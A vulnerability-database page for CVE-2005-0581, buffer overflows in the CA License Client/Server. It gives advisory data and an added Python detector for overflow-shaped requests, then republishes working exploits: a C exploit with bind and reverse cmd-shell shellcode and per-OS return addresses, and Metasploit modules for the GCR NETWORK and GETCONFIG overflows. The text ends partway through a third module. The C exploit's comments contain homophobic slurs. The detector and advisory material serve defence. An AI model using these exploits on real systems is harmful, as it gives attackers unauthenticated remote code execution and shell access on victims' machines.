CVE-2005-0581
CVSS 4.6
Published: 2005-05-02 00:00:00
Revised: 2016-10-17 23:12:53

[Original] Multiple buffer overflows in Computer Associates (CA) License Client and Server 0.1.0.15 allow remote attackers to execute arbitrary code via (1) certain long fields in the Checksum item in a GCR request, (2) a long IP address, hostname, or netmask values in a GCR request, (3) a long last parameter in a GETCONFIG packet, or (4) long values in a request with an invalid format.
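The four vectors above all live in one small text protocol: a request is `<seq> <COMMAND> args NAME<value>NAME<value>...<EOM>` (the GCR, GETCONFIG and GETSERVER samples quoted in the Metasploit module notes further down this page show the benign shapes). The parser and detector below is an added example written for this page, not CA or Metasploit code. MAX_FIELD and MAX_TOKEN are assumed limits, since the advisories only describe the fields as "long"; the sample requests are constructed, the benign ones copied from the shapes on this page and the hostile ones reproducing each exploit's request layout with filler bytes where the shellcode would go.

```python
"""CA License (lic98) request parser with CVE-2005-0581 overflow-shape detection.
Added example for this page, not CA or Metasploit code. Request syntax follows the
samples quoted in the Metasploit modules below; MAX_FIELD and MAX_TOKEN are assumed
limits (the advisories only say the fields are "long")."""
import ipaddress
import re

EOM = "<EOM>"
KNOWN_COMMANDS = {"GCR", "GETCONFIG", "GETSERVER"}
MAX_FIELD = 256   # assumption: longest NAME<value> item accepted as benign
MAX_TOKEN = 64    # assumption: longest checksum entry, hostname or GETCONFIG parameter
FIELD_RE = re.compile(r"([A-Z0-9]+)<([^<>]*)>")   # NAME<value> items
SEQ_RE = re.compile(r"^[A-Z][0-9]+$")             # request tag such as A0


def _tokens(text):
    # split on ASCII blank/tab only; str.split() would also break on latin-1
    # control bytes (0x1c-0x1f, 0x85, 0xa0) that exploit padding may contain
    return [t for t in re.split(r"[ \t]+", text) if t]


def parse_message(raw):
    """Return (seq, command, args, fields) for '<seq> <CMD> args NAME<v>...<EOM>'.
    Decodes as latin-1 so binary padding survives; ValueError if <EOM> is missing."""
    text = raw.decode("latin-1").rstrip("\r\n")
    if not text.endswith(EOM):
        raise ValueError("request is not terminated by <EOM>")
    body = text[:-len(EOM)]
    first = FIELD_RE.search(body)
    head = body[:first.start()] if first else body
    fields = dict(FIELD_RE.findall(body[first.start():])) if first else {}
    tokens = _tokens(head)
    seq = tokens.pop(0) if tokens and SEQ_RE.match(tokens[0]) else ""
    command = tokens.pop(0) if tokens else ""
    return seq, command, tokens, fields


def _valid_network(value):
    """NETWORK<ip hostname netmask>: exactly three tokens, dotted quads at both ends."""
    parts = _tokens(value)
    if len(parts) != 3 or len(parts[1]) > MAX_TOKEN:
        return False
    try:
        ipaddress.IPv4Address(parts[0])
        ipaddress.IPv4Address(parts[2])
    except ValueError:
        return False
    return True


def inspect(raw):
    """Vectors of CVE-2005-0581 that a request would exercise; [] means it looks benign.
    gcr-checksum (1), gcr-network (2), getconfig-param (3), invalid-format (4);
    oversized-field marks any other NAME<value> item beyond MAX_FIELD (same bug class)."""
    try:
        seq, command, args, fields = parse_message(raw)
    except ValueError:
        return ["invalid-format"] if len(raw) > MAX_FIELD else []
    findings = []
    big_field = any(len(v) > MAX_FIELD for v in fields.values())
    if command == "GCR":
        if any(len(e) > MAX_TOKEN for e in _tokens(fields.get("CHECKSUMS", ""))):
            findings.append("gcr-checksum")
        if "NETWORK" in fields and not _valid_network(fields["NETWORK"]):
            findings.append("gcr-network")
    elif command == "GETCONFIG":
        if args and len(args[-1]) > MAX_TOKEN:
            findings.append("getconfig-param")
    if (not seq or command not in KNOWN_COMMANDS) and (
            big_field or len(command) > MAX_TOKEN or any(len(a) > MAX_TOKEN for a in args)):
        findings.append("invalid-format")
    if big_field:
        findings.append("oversized-field")
    return findings


# Constructed samples: the benign ones follow the requests quoted in the Metasploit
# modules on this page, the hostile ones reproduce the shape of each exploit request
# with filler bytes where the shellcode would be.
BENIGN = [
    b"A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>"
    b"IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>"
    b"VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>"
    b"CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.3.1><EOM>",
    b"A0 GETCONFIG SELF 0<EOM>",
    b"A0 GETSERVER<EOM>\n",
]
HOSTILE = {
    "gcr-checksum": b"A0 GCR CHECKSUMS<0 0 0 " + b"A" * 600 + b" 0>RMTV<1.00><EOM>",
    "gcr-network": b"A0 GCR NETWORK<" + b"B" * 300 + b">RMTV<1.00><EOM>",      # license_gcr.rb
    "getconfig-param": b"A0 GETCONFIG SELF " + b"C" * 900 + b"<EOM>",          # calicserv_getconfig.rb
    "invalid-format": b"GBR " + b"\x90" * 2024 + b"\x9f\xf8\x1a\x01"          # class101's exploit:
                      + b"\x90" * 1180 + b" <EOM>\r\n",                        # unknown command + long arg
}

if __name__ == "__main__":
    for raw in BENIGN:
        print("benign          ", inspect(raw))
    for name, raw in HOSTILE.items():
        print(f"{name:16}", inspect(raw))
```

Run it over reassembled TCP payloads to ports 10202 and 10203. The margin is wide: every legitimate item on this page is tens of bytes, while the exploit buffers are 256 to 3000 bytes, so the assumed limits can be tightened or loosened considerably without changing the verdicts.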


[CNNVD] CA License Client/Server GETCONFIG Buffer Overflow Vulnerability (CNNVD-200505-112)

        A buffer overflow exists in the way CA License Client/Server handles GETCONFIG request parameters. A remote attacker could exploit it to execute arbitrary code on the server or on the client.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [reduced performance or interrupted access to resources]
Access complexity: LOW [no special access conditions required]
Access vector: LOCAL [requires physical access or a local account]
Authentication: NONE [no authentication required]
Note: the LOCAL access vector, and the 4.6 score that follows from it, contradict the description and every exploit on this page, all of which reach the service over TCP (10202 for the server, 10203 for the client) with no credentials; treat this as unauthenticated remote code execution when prioritizing.

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0581
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0581
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-112
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110979326828704&w=2
(UNKNOWN)  BUGTRAQ  20050302 License Patches Are Now Available To Address Buffer Overflows
http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp
(VENDOR_ADVISORY)  CONFIRM  http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp
http://www.idefense.com/application/poi/display?id=210&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050302 Computer Associates License Client and Server Invalid Command Buffer Overflow
http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050302 Computer Associates License Client/Server GETCONFIG Buffer Overflow
http://www.idefense.com/application/poi/display?id=214&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050302 Computer Associates License Client/Server GCR Network Buffer Overflow
http://www.idefense.com/application/poi/display?id=215&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050302 Computer Associates License Client/Server GCR Checksum Buffer Overflow

- Vulnerability information

CA License Client/Server GETCONFIG Buffer Overflow Vulnerability
Medium risk  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote  
        A buffer overflow exists in the way CA License Client/Server handles GETCONFIG request parameters. A remote attacker could exploit it to execute arbitrary code on the server or on the client.

- Advisory and patches

        The vendor has released a patch for this issue; download link:
        http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#alp

- Vulnerability information (859)

CA License Server (GETCONFIG) Remote Buffer Overflow Exploit (c) (EDBID:859)
windows remote
2005-03-06 Verified
10203 class101
N/A [Download]
/*
Computer-Associates, License Service Stack Overflow

Homepage:         ca.com
Affected version: v1.61 and below (in eTrust, Unicenter, BrightStor, etc..)
Patched  version: hotfix
Link:             ca.com
Date:             04 March 2005

Application Risk: Tsunami
Internet Risk:    High

Discovery Credits: Barnaby Jack (eeye.com)
Exploit Credits : class101

Hole History:

		02-3-2005: BOF flaws published by Barnaby Jack of eeye.com
		04-3-2005: metasploit module released
		06-2-2005: hat-squad exploit released using again another way than msf,
		           a nasty way auto-bypassing XP/2003 stack's protections :)

Notes:

		-2 bad chars, 0x00, 0x20
		-This is possible to trigger at least several big flaws per affected commands,
			case1: you own eip, ebx 4 bytes up to it is usable
			case2: you own eip, esp pointing right after is usable
			case3: you own eip, esi pointing into the buffer
			In this exploit, I have chosen case2, allowing us to overwrite eip with a
			jmp/call esp, a push esp, retn or why not something useful in a ca's dll, w00t :P, can be a good challenge to search on this, look around 
			0x10010000.licscvr.dll 			
		-tiny upgrade of the awesome vlad902's shellcode to remove that f'king 0x20 into the decoded reverse shellcode v1.31
		    by the way, sending up this bad char to the bottom of what you know of some amazing wannabel33t deface kiddies crawling my website,
		    talking in sh0utb0x, sucking my c0x, answer in a code, he! :-) (IHS , iranian homosec deface team to not name them :>)
		-beware that the ca license service autoban and this is possible to know the OS with
		    A0 GETCONFIG SELF A <EOM>

Greet:

		NIMA MAJIDI
		BEHRANG FOULADI
		PEJMAN
		HAMID! :)
		HAT-SQUAD.COM
		metasploit.com
		A^C^E of addict3d.org
		str0ke of milw0rm.com
		and my homy CLASS101.ORG :>
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>   /* atoi() is used on both platforms */
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode[]=
"\x33\xC9\x83\xE9\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";

char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
  NOT xored, modded by class101 to remove the common badchar "\x20"
  original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A"
"\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";

char payload[8192];

char esp2k[]="\x9F\xF8\x1A\x01";  /*jmp.esp*/
char espNT[]="\xA8\x14\xF9\x77";  /*push.esp.return*/
char espXP1[]="\x5E\xF0\xF7\x77";  /*push.esp.return*/
char espXP2[]="\x5C\xC3\x92\x7C";  /*push.esp.return*/
char espk3[]="\xAB\x8B\xFB\x77";  /*jmp.esp*/
char EOL[]="\x0D\x0A";
char talk1[]=
"\x47\x42\x52\x20";
char talk2[]=
"\x20\x3C\x45\x4F\x4D\x3E";

#ifdef WIN32
	WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
#ifndef WIN32
#define Sleep		sleep
#define SOCKET		int
#define closesocket(s) close(s)
#endif
	unsigned long gip=0;
	unsigned short gport=0;
	char *target=NULL, *os=NULL;
	int tnum, port;
	SOCKET s;
	struct sockaddr_in server;

	ver();
	/* argc: 3 = bind mode on the default port, 4 = bind mode on an explicit port,
	   6 = reverse mode with listener ip/port. argv[1] selects the target (1-5). */
	if (argc>6||argc<3||atoi(argv[1])>5||atoi(argv[1])<1){usage(argv[0]);return -1;}
	if (argc==5){usage(argv[0]);return -1;}
	if (strlen(argv[2])<7){usage(argv[0]);return -1;}
	if (argc==6 && strlen(argv[4])<7){usage(argv[0]);return -1;}
	tnum=atoi(argv[1]);
#ifdef WIN32
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
#endif
	if (argc==6)
	{
		/* listener address and port, already in network byte order, patched into scode2 below */
		gip=inet_addr(argv[4]);
		gport=htons((unsigned short)atoi(argv[5]));
	}
	if (argc==4||argc==6){port=atoi(argv[3]);} else port=10203;
	switch (tnum)
	{
		case 1: target=esp2k;  os="Win2k SP4 Server English\n[+]            Win2k SP4 Pro    English\n[+]            Win2k SP? ?      ?"; break;
		case 2: target=espNT;  os="WinNT SP6 Wkst. English"; break;
		case 3: target=espXP2; os="WinXP SP2 Pro. English"; break;
		case 4: target=espXP1; os="WinXP SP1a Pro. English"; break;
		default: target=espk3; os="Win2003 SP0 Server English"; break;
	}
	printf("[+] target(s): %s\n",os);
	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==-1){printf("[+] socket() error\n");return -1;}
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=inet_addr(argv[2]);
	server.sin_port=htons((unsigned short)port);
	/* blocking connect: its return value is the connection check, no select() needed */
	if (connect(s,(struct sockaddr *)&server,sizeof(server))==-1){printf("[+] connect() error\n");closesocket(s);return -1;}
	printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
	Sleep(1000);
#else
	Sleep(1);
#endif
	/* payload layout: "GBR " | 2024 x 0x90 | 4-byte return address (jmp/push esp) |
	   6 x 0x90 | shellcode | 0x90 filler up to offset 3212 | " <EOM>" | CRLF.
	   The return address overwrites the saved eip, so esp then points just past it, into the NOPs. */
	strcpy(payload,talk1);
	memset(payload+4,0x90,3208);
	memcpy(payload+2024+4,target,4);
	strcat(payload,talk2);strcat(payload,EOL);
	if (argc==6)
	{
		/* offsets 167 and 173 are the push imm32/imm16 operands for ip and port;
		   a zero byte in either is a bad char and would also truncate the strlen() copy */
		memcpy(&scode2[167], &gip, 4);
		memcpy(&scode2[173], &gport, 2);
		memcpy(payload+2038,scode2,strlen(scode2));
	}
	else memcpy(payload+2038,scode,strlen(scode));
	if (send(s,payload,(int)strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");closesocket(s);return -1;}
#ifdef WIN32
	Sleep(2000);
#else
	Sleep(2);
#endif
	printf("[+] size of payload: %u\n",(unsigned int)strlen(payload));
	printf("[+] payload sent.\n");
	closesocket(s);
#ifdef WIN32
	WSACleanup();
#endif
	return 0;
}


void usage(char* us)
{
	printf("USAGE:                                                                         \n");
	printf("      [+]  . 101_calic.exe Target VulnIP (bind mode)                           \n");
	printf("      [+]  . 101_calic.exe Target VulnIP VulnPORT (bind mode)                  \n");
	printf("      [+]  . 101_calic.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
	printf("TARGET:                                                                        \n");
	printf("      [+] 1. Win2k  SP4  Server English (*)                                    \n");
	printf("      [+] 1. Win2k  SP4  Pro    English (*)                                    \n");
	printf("      [+] 1. Win2k  SP?  ?      ?                                              \n");
	printf("      [+] 2. WinNT  SP6  Wkst.  English (*)                                    \n");
	printf("      [+] 3. WinXP  SP2  Pro.   English                                        \n");
	printf("      [+] 4. WinXP  SP1a Pro.   English (*)                                    \n");
	printf("      [+] 5. Win2k3 SP0  Server English                                        \n");
	printf("NOTE:                                                                          \n");
	printf("      The exploit bind a cmdshell port 101 or                                  \n");
	printf("      reverse a cmdshell on your listener.                                     \n");
	printf("      A wildcard (*) mean tested working, else, supposed working.              \n");
	printf("      A symbol   (-) mean all.                                                 \n");
	printf("      Compilation msvc6, cygwin, Linux.                                        \n");
	return;
}
void ver()
{
	printf("                                                                     \n");
	printf("        ===================================================[0.1]=====\n");
	printf("        =======Computer Associates, License Client Service===========\n");
	printf("        ==============Remote Stack Overflow Exploit==================\n");
	printf("        ======coded by class101==================[Hat-Squad.com]=====\n");
	printf("        =====================================[class101.org 2005]=====\n");
	printf("                                                                     \n");
}

// milw0rm.com [2005-03-06]
		

- Vulnerability information (16414)

CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow (EDBID:16414)
windows remote
2010-11-03 Verified
0 metasploit
N/A [Download]
##
# $Id: license_gcr.rb 10892 2010-11-03 22:09:44Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0.
				By sending a specially crafted request to the lic98rmtd.exe service, an attacker
				could overflow the buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10892 $',
			'References'     =>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x0c\x25\x26\x27\x0b\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform' => 'win',
			'Targets'  =>
					[
						[ 'Windows 2003 SP0 English',     { 'Ret' => 0x71ae1f9b } ], # JMP ESP wshtcpip.dll
						[ 'Windows 2000 SP4 English',     { 'Ret' => 0x7c30d043 } ], # JMP ESP advapi32.dll
					],
			'DisclosureDate' => 'Mar 2 2005',
			'DefaultTarget' => 0))

		register_options([ Opt::RPORT(10202) ], self.class)
	end

	def exploit
		connect

		buff =  rand_text_alpha_upper(256) + [target.ret].pack('V')
		buff << make_nops(12) + payload.encoded

		# NETWORK<x.x.x.x buff x.x.x.x.x> ... worked for me.
		sploit  = "A0 GCR NETWORK<#{buff}>RMTV<1.00><EOM>"

		print_status("Trying target #{target.name}...")

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- Vulnerability information (16744)

Computer Associates License Client GETCONFIG Overflow (EDBID:16744)
windows remote
2010-09-20 Verified
10203 metasploit
N/A [Download]
##
# $Id: calicclnt_getconfig.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'Computer Associates License Client GETCONFIG Overflow',
			'Description'	=> %q{
					This module exploits a vulnerability in the CA License Client
				service. This exploit will only work if your IP address can be
				resolved from the target system's point of view. This can be
				accomplished on a local network by running the 'nmbd' service
				that comes with Samba. If you are running this exploit from
				Windows and do not filter udp port 137, this should not be a
				problem (if the target is on the same network segment). Due to
				the bugginess of the software, you are only allowed one connection
				to the agent port before it starts ignoring you. If it wasn't for this
				issue, it would be possible to repeatedly exploit this bug.
			},
			'Author' =>
				[
					'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
					'patrick', # msf v3 port :)
				],
			'License' => MSF_LICENSE,
			'Version' => '$Revision: 10394 $',
			'References'	=>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
				],
			'Privileged' => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					'Space'	=> 600,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'	=> 'win',
			'Targets' =>
				[
					# As much as I would like to return back to the DLL or EXE,
					# all of those modules have a leading NULL in the
					# loaded @ address :(
					# name, jmp esi, writable, jmp edi
					#['Automatic', {} ],
					#
					# patrickw - tested OK Windows XP English SP0-1 only 20100214
					['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
					['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
				],
			'DisclosureDate' => 'Mar 02 2005'))

		register_options(
			[
				Opt::RPORT(10203),
				OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),
			], self.class)
	end

	#def check
		# It is possible to check, but due to a software bug, checking prevents exploitation
	#end

	def exploit
		if (connect)
			sock.put("A0 GETSERVER<EOM>\n")
			print_status("Initial packet sent to remote agent...")
			disconnect

			fakecaservice = Rex::Socket::TcpServer.create(
				'LocalHost' => '0.0.0.0',
				'LocalPort' => datastore['SRVPORT'],
				'SSL'       => false,
				'Context'   =>
					{
						'Msf'        => framework,
						'MsfExploit' => self,
					})

			add_socket(fakecaservice)

			fakecaservice.start
			print_status("Waiting for the license agent to connect back...")
			begin
				Timeout.timeout(3) do
					done = false
					while (not done and session = fakecaservice.accept)
						print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")
						session.put("A0 GETCONFIG SELF 0<EOM>")
						req = session.recvfrom(2000)[0]
						next if not req
						next if req.empty?

						if (req =~ /OS\<([^\>]+)/)
							print_status("Target reports OS: #{$1}")
						end

						# exploits two different versions at once >:-)
						# 144 -> return address of esi points to string middle
						# 196 -> return address of edi points to string beginning
						# 148 -> avoid exception by patching with writable address
						# 928 -> seh handler (not useful under XP SP2)
						buff = rand_text_alphanumeric(900)
						buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses
						buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi
						buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address
						buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address
						buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi
						buff[272, payload.encoded.length] = payload.encoded

						sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
						session.put(sploit)
						session.close
					end
				end
			ensure
				handler
				fakecaservice.close
				return
			end
		end
	end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end

		

- Vulnerability information (16745)

Computer Associates License Server GETCONFIG Overflow (EDBID:16745)
windows remote
2010-09-20 Verified
10202 metasploit
N/A [Download]
##
# $Id: calicserv_getconfig.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'Computer Associates License Server GETCONFIG Overflow',
			'Description'	=> %q{
					This module exploits a vulnerability in the CA License Server
				network service. By sending an excessively long GETCONFIG
				packet the stack may be overwritten.
			},
			'Author' =>
				[
					'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
					'patrick', # msf v3 port :)
				],
			'License' => MSF_LICENSE,
			'Version' => '$Revision: 10394 $',
			'References'	=>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
				],
